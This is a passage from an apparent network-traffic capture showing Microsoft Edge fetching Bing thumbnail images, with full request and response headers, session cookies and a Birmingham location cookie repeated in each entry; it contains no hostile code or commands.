sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1688
cache-control: public, max-age=1209558
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b4544e
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.iU3Ttm48_MlTX7rtNHBYSgHaFF&w=80&h=80&c=1&vt=10&bgcl=eaddc3&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.iU3Ttm48_MlTX7rtNHBYSgHaFF&w=80&h=80&c=1&vt=10&bgcl=eaddc3&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1607
cache-control: public, max-age=1209591
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45458
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.05630131-96e2-4d6d-b53d-8ee9ba457c5a&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.05630131-96e2-4d6d-b53d-8ee9ba457c5a&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2895
cache-control: public, max-age=1209564
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b4543a
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.5pS2YnRDy-zu-3NVmyuvaAAAAA&w=80&h=80&c=1&vt=10&bgcl=5abd90&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.5pS2YnRDy-zu-3NVmyuvaAAAAA&w=80&h=80&c=1&vt=10&bgcl=5abd90&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 991
cache-control: public, max-age=1209560
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45452
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.e18f1e35-c05e-441c-8be7-151aaa572f7d&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.e18f1e35-c05e-441c-8be7-151aaa572f7d&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1907
cache-control: public, max-age=1209600
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45454
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.MoWbqqAMfEnNhT1jPF8c1AHaEK&w=80&h=80&c=1&vt=10&bgcl=2c3715&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.MoWbqqAMfEnNhT1jPF8c1AHaEK&w=80&h=80&c=1&vt=10&bgcl=2c3715&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1537
cache-control: public, max-age=1209564
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45456
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.35C32GZeEouFRqtr-ZkmXsRao-xUAc_rBmFb1d6xKqw&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSK.35C32GZeEouFRqtr-ZkmXsRao-xUAc_rBmFb1d6xKqw&w=120&h=120&c=6&p=0&pid=RS HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
